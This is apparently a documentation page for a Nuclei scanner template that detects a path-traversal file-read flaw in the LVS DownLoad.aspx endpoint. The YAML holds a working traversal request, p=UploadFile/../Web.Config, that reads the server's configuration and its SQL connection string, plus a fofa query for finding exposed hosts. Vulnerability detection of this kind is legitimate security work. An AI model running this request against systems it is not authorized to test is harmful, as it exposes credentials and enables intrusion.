LVS DownLoad.aspx - Local File Inclusion (LFI)
ID: lvs-download-lfi
Severity: high
Author: pussycat0x
Tags: lvs,lfi
Description
Section titled “Description”LVS lean value management system DownLoad.aspx has an arbitrary file reading vulnerability.
YAML Source
Section titled “YAML Source”id: lvs-download-lfi
info: name: LVS DownLoad.aspx - Local File Inclusion (LFI) author: pussycat0x severity: high description: | LVS lean value management system DownLoad.aspx has an arbitrary file reading vulnerability. reference: - https://github.com/wy876/POC/blob/main/LVS%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FDownLoad.aspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md#lvs%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9Fdownloadaspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E metadata: verified: true max-request: 1 fofa-query: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx" tags: lvs,lfi
http: - method: GET path: - "{{BaseURL}}/Business/DownLoad.aspx?p=UploadFile/../Web.Config"
matchers-condition: and matchers: - type: word part: body words: - '<configuration>' - '<appSettings>' - '<add key="SqlConnString"' condition: and
- type: word part: content_type words: - 'application/ms-excel'
- type: status status: - 200# digest: 4b0a00483046022100eb62013cb3778cc0ee8eeb27e6107ff6caa8db688139ff8eb0761926658242e5022100f550f3e0568fb582ddcdb8e5e3899190a0868265bef62f1f243b9c93c2df3340:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/lvs-download-lfi.yaml"